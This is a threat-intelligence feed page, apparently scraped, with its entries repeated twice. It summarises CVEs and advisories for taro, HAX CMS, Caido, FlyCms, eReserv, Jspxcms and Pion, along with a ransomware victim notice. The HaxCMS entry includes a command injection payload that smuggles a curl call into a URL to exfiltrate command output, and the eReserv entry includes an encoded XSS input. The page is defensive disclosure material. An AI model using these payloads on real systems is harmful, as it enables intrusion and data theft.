CyberAlerts

CVE-2025-5896

Description: A vulnerability was found in tarojs taro up to 4.1.1. It has been declared as problematic. This vulnerability affects unknown code of the file taro/packages/css-to-react-native/src/index.js. The manipulation leads to inefficient regular expression complexity. The attack can be initiated remotely. Upgrading to version 4.1.2 is able to address this issue. The name of the patch is c2e321a8b6fc873427c466c69f41ed0b5e8814bf. It is recommended to upgrade the affected component. In tarojs taro bis 4.1.1 wurde eine Schwachstelle ausgemacht. Sie wurde als problematisch eingestuft. Dabei geht es um eine nicht genauer bekannte Funktion der Datei taro/packages/css-to-react-native/src/index.js. Mittels dem Manipulieren mit unbekannten Daten kann eine inefficient regular expression complexity-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Ein Aktualisieren auf die Version 4.1.2 vermag dieses Problem zu lösen. Der Patch wird als c2e321a8b6fc873427c466c69f41ed0b5e8814bf bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen.

CVSS: MEDIUM (4.3)

EPSS Score: 0.05%

Source: CVE

June 9th, 2025 (13 days ago)

CVE-2025-49137

Hax CMS Stored Cross-Site Scripting vulnerability

Description: HAX CMS PHP allows users to manage their microsite universe with a PHP backend. Prior to version 11.0.0, the application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The 'saveNode' and 'saveManifest' endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site. Although the application does not allow users to supply a `script` tag, it does allow the use of other HTML tags to run JavaScript. Version 11.0.0 fixes the issue.

CVSS: HIGH (8.5)

EPSS Score: 0.04%

Source: CVE

June 9th, 2025 (13 days ago)

CVE-2025-49004

Hijacking Caido instance during the initial setup via DNS Rebinding to achieve RCE

Description: Caido is a web security auditing toolkit. Prior to version 0.48.0, due to the lack of protection for DNS rebinding, Caido can be loaded on an attacker-controlled domain. This allows a malicious website to hijack the authentication flow of Caido and achieve code execution. A malicious website loaded in the browser can hijack the locally running Caido instance and achieve remote command execution during the initial setup. Even if the Caido instance is already configured, an attacker can initiate the authentication flow by performing DNS rebinding. In this case, the victim needs to authorize the request on dashboard.caido.io. Users should upgrade to version 0.48.0 to receive a patch.

CVSS: HIGH (7.5)

EPSS Score: 0.21%

Source: CVE

June 9th, 2025 (13 days ago)

CVE-2024-22818

FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerbility via /system/site/filterKeyword_save

Description: FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerbility via /system/site/filterKeyword_save

CVSS: HIGH (8.8)

EPSS Score: 0.09%

SSVC Exploitation: poc

Source: CVE

June 9th, 2025 (13 days ago)

CVE-2024-1026

Cogites eReserv config.php cross site scripting

Description: A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability. Eine problematische Schwachstelle wurde in Cogites eReserv 7.7.58 gefunden. Betroffen davon ist ein unbekannter Prozess der Datei front/admin/config.php. Durch Manipulieren des Arguments id mit der Eingabe %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen.

CVSS: LOW (3.5)

EPSS Score: 0.05%

SSVC Exploitation: none

Source: CVE

June 9th, 2025 (13 days ago)

CVE-2024-0721

Jspxcms Survey Label cross site scripting

Description: A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. In Jspxcms 10.2.0 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Es geht um eine nicht näher bekannte Funktion der Komponente Survey Label Handler. Durch Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.

CVSS: LOW (3.5)

EPSS Score: 0.16%

SSVC Exploitation: none

Source: CVE

June 9th, 2025 (13 days ago)

[@haxtheweb/haxcms-nodejs] HaxCMS-PHP Command Injection Vulnerability

Description: Summary The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection. Details The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection. Affected Resources • Operations.php:2103 gitImportSite() • //system/api/gitImportSite PoC To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite'). Start a webserver. Initiate a request to the ’archiveSite’ endpoint. Capture and modify the request in BurpSuite. Observe command output in the HTTP request from the server. Command Injection Payload http:///.git;curl${IFS}/$(whoami)/$(id)#=abcdef Impact An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request. References https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw...

Source: Github Advisory Database (NPM)

June 9th, 2025 (13 days ago)

Gartner: How Security Teams Can Turn Hype Into Opportunity

Description: During the opening keynote at Gartner Security & Risk Management Summit 2025, analysts weighed in on how CISOs and security teams can use security fervor around AI and other tech to the betterment of their security posture.

Source: Dark Reading

June 9th, 2025 (13 days ago)

[github.com/pion/interceptor] Pion Interceptor's improper RTP padding handling allows remote crash for SFU users (DoS)

Description: Impact Pion Interceptor versions v0.1.36 through v0.1.38 contain a bug in a RTP packet factory that can be exploited to trigger a panic with Pion based SFU via crafted RTP packets, This only affect users that use pion/interceptor. Patches Upgrade to v0.1.39 or later, which includes PR #338 which validates that: padLen > 0 && padLen <= payloadLength and return error on overflow, avoiding panic. If upgrading is not possible, apply the patch from the pull request manually or drop packets whose P-bit is set but whose padLen is zero or larger than the remaining payload. Workarounds At the application layer, reject any RTP packet where: hasPadding (P-bit field) == true && (padLen == 0 || padLen > packetLen – headerLen) before passing it to Pion’s packet factories. References Commit fixing the bug: https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5 Pull request: https://github.com/pion/interceptor/pull/338 Issue: https://github.com/pion/webrtc/issues/3148 References https://github.com/pion/interceptor/security/advisories/GHSA-f26w-gh5m-qq77 https://github.com/pion/webrtc/issues/3148 https://github.com/pion/interceptor/pull/338 https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5 https://github.com/advisories/GHSA-f26w-gh5m-qq77

Source: Github Advisory Database (Go)

June 9th, 2025 (13 days ago)

🏴‍☠️ Medusa has just published a new victim : San Jose Country Club

Description: San Jose Country Club is a premier family-friendly private golf club located in Northern California, established in 1899 and known for its rich tradition. The club offers year-round golf, dining options, and various social activities, making it a sought-after destination for members in the Bay Area. It features a newly remodeled clubhouse and event facilities for hosting weddings and special events. Catering to golf enthusiasts and families alike, the club emphasizes superior service and exclusive dining experiences. company is headquartered in 15571 Alum Rock Ave San Jose, CA 95127 The total amount of data leakage is 117.5 GB

Source: Ransomware.live

June 9th, 2025 (13 days ago)

Threat and Vulnerability Intelligence Database

Example Searches:

CVE-2025-5896	tarojs taro index.js redos Description: A vulnerability was found in tarojs taro up to 4.1.1. It has been declared as problematic. This vulnerability affects unknown code of the file taro/packages/css-to-react-native/src/index.js. The manipulation leads to inefficient regular expression complexity. The attack can be initiated remotely. Upgrading to version 4.1.2 is able to address this issue. The name of the patch is c2e321a8b6fc873427c466c69f41ed0b5e8814bf. It is recommended to upgrade the affected component. In tarojs taro bis 4.1.1 wurde eine Schwachstelle ausgemacht. Sie wurde als problematisch eingestuft. Dabei geht es um eine nicht genauer bekannte Funktion der Datei taro/packages/css-to-react-native/src/index.js. Mittels dem Manipulieren mit unbekannten Daten kann eine inefficient regular expression complexity-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Ein Aktualisieren auf die Version 4.1.2 vermag dieses Problem zu lösen. Der Patch wird als c2e321a8b6fc873427c466c69f41ed0b5e8814bf bezeichnet. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. CVSS: MEDIUM (4.3) EPSS Score: 0.05% Source: CVE June 9th, 2025 (13 days ago)
CVE-2025-49137	Hax CMS Stored Cross-Site Scripting vulnerability Description: HAX CMS PHP allows users to manage their microsite universe with a PHP backend. Prior to version 11.0.0, the application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The 'saveNode' and 'saveManifest' endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site. Although the application does not allow users to supply a `script` tag, it does allow the use of other HTML tags to run JavaScript. Version 11.0.0 fixes the issue. CVSS: HIGH (8.5) EPSS Score: 0.04% Source: CVE June 9th, 2025 (13 days ago)
CVE-2025-49004	Hijacking Caido instance during the initial setup via DNS Rebinding to achieve RCE Description: Caido is a web security auditing toolkit. Prior to version 0.48.0, due to the lack of protection for DNS rebinding, Caido can be loaded on an attacker-controlled domain. This allows a malicious website to hijack the authentication flow of Caido and achieve code execution. A malicious website loaded in the browser can hijack the locally running Caido instance and achieve remote command execution during the initial setup. Even if the Caido instance is already configured, an attacker can initiate the authentication flow by performing DNS rebinding. In this case, the victim needs to authorize the request on dashboard.caido.io. Users should upgrade to version 0.48.0 to receive a patch. CVSS: HIGH (7.5) EPSS Score: 0.21% Source: CVE June 9th, 2025 (13 days ago)
CVE-2024-22818	FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerbility via /system/site/filterKeyword_save Description: FlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerbility via /system/site/filterKeyword_save CVSS: HIGH (8.8) EPSS Score: 0.09% SSVC Exploitation: poc Source: CVE June 9th, 2025 (13 days ago)
CVE-2024-1026	Cogites eReserv config.php cross site scripting Description: A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability. Eine problematische Schwachstelle wurde in Cogites eReserv 7.7.58 gefunden. Betroffen davon ist ein unbekannter Prozess der Datei front/admin/config.php. Durch Manipulieren des Arguments id mit der Eingabe %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. CVSS: LOW (3.5) EPSS Score: 0.05% SSVC Exploitation: none Source: CVE June 9th, 2025 (13 days ago)
CVE-2024-0721	Jspxcms Survey Label cross site scripting Description: A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. In Jspxcms 10.2.0 wurde eine Schwachstelle gefunden. Sie wurde als problematisch eingestuft. Es geht um eine nicht näher bekannte Funktion der Komponente Survey Label Handler. Durch Manipulieren mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. CVSS: LOW (3.5) EPSS Score: 0.16% SSVC Exploitation: none Source: CVE June 9th, 2025 (13 days ago)
	[@haxtheweb/haxcms-nodejs] HaxCMS-PHP Command Injection Vulnerability Description: Summary The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection. Details The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection. Affected Resources • Operations.php:2103 gitImportSite() • //system/api/gitImportSite PoC To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite'). Start a webserver. Initiate a request to the ’archiveSite’ endpoint. Capture and modify the request in BurpSuite. Observe command output in the HTTP request from the server. Command Injection Payload http:///.git;curl${IFS}/$(whoami)/$(id)#=abcdef Impact An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request. References https://github.com/haxtheweb/issues/security/advisories/GHSA-g4cf-pp4x-hqgw... Source: Github Advisory Database (NPM) June 9th, 2025 (13 days ago)
	Gartner: How Security Teams Can Turn Hype Into Opportunity Description: During the opening keynote at Gartner Security & Risk Management Summit 2025, analysts weighed in on how CISOs and security teams can use security fervor around AI and other tech to the betterment of their security posture. Source: Dark Reading June 9th, 2025 (13 days ago)
	[github.com/pion/interceptor] Pion Interceptor's improper RTP padding handling allows remote crash for SFU users (DoS) Description: Impact Pion Interceptor versions v0.1.36 through v0.1.38 contain a bug in a RTP packet factory that can be exploited to trigger a panic with Pion based SFU via crafted RTP packets, This only affect users that use pion/interceptor. Patches Upgrade to v0.1.39 or later, which includes PR #338 which validates that: padLen > 0 && padLen <= payloadLength and return error on overflow, avoiding panic. If upgrading is not possible, apply the patch from the pull request manually or drop packets whose P-bit is set but whose padLen is zero or larger than the remaining payload. Workarounds At the application layer, reject any RTP packet where: hasPadding (P-bit field) == true && (padLen == 0 \|\| padLen > packetLen – headerLen) before passing it to Pion’s packet factories. References Commit fixing the bug: https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5 Pull request: https://github.com/pion/interceptor/pull/338 Issue: https://github.com/pion/webrtc/issues/3148 References https://github.com/pion/interceptor/security/advisories/GHSA-f26w-gh5m-qq77 https://github.com/pion/webrtc/issues/3148 https://github.com/pion/interceptor/pull/338 https://github.com/pion/interceptor/commit/fa5b35ea867389cec33a9c82fffbd459ca8958e5 https://github.com/advisories/GHSA-f26w-gh5m-qq77 Source: Github Advisory Database (Go) June 9th, 2025 (13 days ago)
	🏴‍☠️ Medusa has just published a new victim : San Jose Country Club Description: San Jose Country Club is a premier family-friendly private golf club located in Northern California, established in 1899 and known for its rich tradition. The club offers year-round golf, dining options, and various social activities, making it a sought-after destination for members in the Bay Area. It features a newly remodeled clubhouse and event facilities for hosting weddings and special events. Catering to golf enthusiasts and families alike, the club emphasizes superior service and exclusive dining experiences. company is headquartered in 15571 Alum Rock Ave San Jose, CA 95127 The total amount of data leakage is 117.5 GB Source: Ransomware.live June 9th, 2025 (13 days ago)